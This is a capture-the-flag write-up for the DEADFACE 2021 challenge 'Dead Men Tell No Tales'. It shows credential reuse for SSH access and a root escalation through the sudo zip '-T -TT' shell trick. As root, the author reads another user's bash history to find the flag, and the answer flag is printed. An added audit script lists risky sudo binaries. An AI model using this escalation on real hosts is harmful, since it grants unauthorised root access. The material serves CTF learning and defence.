# Dead Men Tell No Tales
![Category](http://img.shields.io/badge/Category-Exploitation-orange?style=for-the-badge) ![Points](http://img.shields.io/badge/Points-400-brightgreen?style=for-the-badge)

## Details

>We've discovered a remote system used by DEADFACE. We're not sure what the password is, but we know Donnell Aulner has an account on that machine. We believe DEADFACE has stored valuable information on this machine. The flag exists on the machine in the format flag{some-text-here}. Submit the flag as flag{flag-goes-here}.
>
>Username: dracula
>
>deadmen.deadface.io:22
---

No password is given in this challenge, but we do have a password that `dracula` used previously in another challenge [link here]().

Using that password we can access the shell.

Once logged in, we have a look around but can't see any obvious files, so next we run `sudo -l`:

```bash
dracula@c0d89345e437:~$ sudo -l
Matching Defaults entries for dracula on c0d89345e437:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dracula may run the following commands on c0d89345e437:
(ALL) NOPASSWD: /usr/bin/zip
```

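We can take advantage of a privilege escalation available in the `zip` executable, as detailed [here](https://gtfobins.github.io/gtfobins/zip/). The `-T` option tells zip to test the archive it has just written, and `-TT` sets the command used for that test; because zip is running under sudo, that command runs as root.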

```bash
$ TF=$(mktemp -u)
$ sudo /usr/bin/zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 34%)
# whoami
root
```
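Seen from the defender's side, the finding here is a sudoers rule that grants a binary able to run other commands. The script below is an added example, not part of the original writeup, that flags such rules in `sudo -l` output; the `RISKY` list is an illustrative subset chosen for this example, and the sample input is constructed around the rule shown above.

```sh
#!/bin/sh
# Audit `sudo -l` output for rules granting binaries that can run other commands.
# RISKY is a small illustrative subset assumed for this example, not a complete list.
RISKY="zip tar find vim less awk env man perl python3"

# Constructed sample input; only the zip rule comes from the writeup.
sample_sudo_l() {
cat <<'EOF'
Matching Defaults entries for dracula on host:
    env_reset, mail_badpass

User dracula may run the following commands on host:
    (ALL) NOPASSWD: /usr/bin/zip
    (root) /usr/bin/du -sh /var/log, /usr/bin/tar
    (www-data) NOPASSWD: /usr/bin/id
EOF
}

# Reads `sudo -l` output on stdin and prints one line per risky grant.
audit_sudo_rules() {
    while read -r line; do                  # read trims the leading indent
        case $line in
            "("*")"*) ;;                    # rule lines start with "(runas)"
            *) continue ;;
        esac
        runas=${line%%")"*}; runas=${runas#"("}
        rest=${line#*")"}
        nopasswd=no
        # Commands are comma-separated; a tag applies until a later one overrides it.
        printf '%s\n' "$rest" | tr ',' '\n' | while read -r item; do
            case $item in
                *NOPASSWD:*) nopasswd=yes ;;
                *PASSWD:*)   nopasswd=no ;;
            esac
            # Drop leading tags such as "NOPASSWD:" or "SETENV:".
            item=$(printf '%s\n' "$item" | sed 's/^\([A-Z_][A-Z_]*:[[:space:]]*\)*//')
            path=${item%% *}                # first word is the binary; arguments are ignored
            base=${path##*/}
            [ -n "$base" ] || continue
            case " $RISKY " in
                *" $base "*) printf 'RISKY runas=(%s) nopasswd=%s %s\n' "$runas" "$nopasswd" "$path" ;;
            esac
        done
    done
}

sample_sudo_l | audit_sudo_rules
```

On a real host, pipe `sudo -l -U <user>` (run as root) into `audit_sudo_rules` for each account and review every flagged rule.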

Now that we're root, let's look at what files are in the home directories.

```bash
# ls -alR /home
/home:
total 28
drwxr-xr-x 1 root root 4096 Sep 19 01:37 .
drwxr-xr-x 1 root root 4096 Oct 19 15:30 ..
drwxr-xr-x 2 d34th d34th 4096 Sep 19 01:37 d34th
drwxr-xr-x 1 dracula dracula 4096 Sep 19 01:44 dracula
drwxr-xr-x 1 spookyboi spookyboi 4096 Sep 19 01:39 spookyboi

/home/d34th:
total 24
drwxr-xr-x 2 d34th d34th 4096 Sep 19 01:37 .
drwxr-xr-x 1 root root 4096 Sep 19 01:37 ..
-rw-r--r-- 1 d34th d34th 220 Sep 19 01:37 .bash_logout
-rw-r--r-- 1 d34th d34th 3771 Sep 19 01:37 .bashrc
-rw-r--r-- 1 d34th d34th 807 Sep 19 01:37 .profile

/home/dracula:
total 36
drwxr-xr-x 1 dracula dracula 4096 Sep 19 01:44 .
drwxr-xr-x 1 root root 4096 Sep 19 01:37 ..
-rw------- 1 dracula dracula 1 Sep 19 01:45 .bash_history
-rw-r--r-- 1 dracula dracula 220 Sep 19 01:37 .bash_logout
-rw-r--r-- 1 dracula dracula 3771 Sep 19 01:37 .bashrc
drwxrwxr-x 3 dracula dracula 4096 Sep 19 01:44 .local
-rw-r--r-- 1 dracula dracula 807 Sep 19 01:37 .profile

/home/dracula/.local:
total 16
drwxrwxr-x 3 dracula dracula 4096 Sep 19 01:44 .
drwxr-xr-x 1 dracula dracula 4096 Sep 19 01:44 ..
drwx------ 3 dracula dracula 4096 Sep 19 01:44 share

/home/dracula/.local/share:
total 12
drwx------ 3 dracula dracula 4096 Sep 19 01:44 .
drwxrwxr-x 3 dracula dracula 4096 Sep 19 01:44 ..
drwx------ 2 dracula dracula 4096 Sep 19 01:44 nano

/home/dracula/.local/share/nano:
total 8
drwx------ 2 dracula dracula 4096 Sep 19 01:44 .
drwx------ 3 dracula dracula 4096 Sep 19 01:44 ..

/home/spookyboi:
total 28
drwxr-xr-x 1 spookyboi spookyboi 4096 Sep 19 01:39 .
drwxr-xr-x 1 root root 4096 Sep 19 01:37 ..
-rw------- 1 spookyboi spookyboi 93 Sep 19 01:39 .bash_history
-rw-r--r-- 1 spookyboi spookyboi 220 Sep 19 01:37 .bash_logout
-rw-r--r-- 1 spookyboi spookyboi 3771 Sep 19 01:37 .bashrc
-rw-r--r-- 1 spookyboi spookyboi 807 Sep 19 01:37 .profile
```
There's not a lot, but there are some hidden files in spookyboi's home folder.

Let's take a look at his `.bash_history`:

```bash
# cat /home/spookyboi/.bash_history
cd ~
echo "flag{c4c089cdbe222b9360880a07c987b581c6f51609}" > flag.txt
rm flag.txt
exit
exit
#

```
And there's our flag!

## flag{c4c089cdbe222b9360880a07c987b581c6f51609}

Original writeup (https://github.com/CTSecUK/DEADFACE_CTF_2021/blob/main/Write-ups/Exploitation/Dead%20Men%20Tell%20No%20Tales%20(400%20Points).md).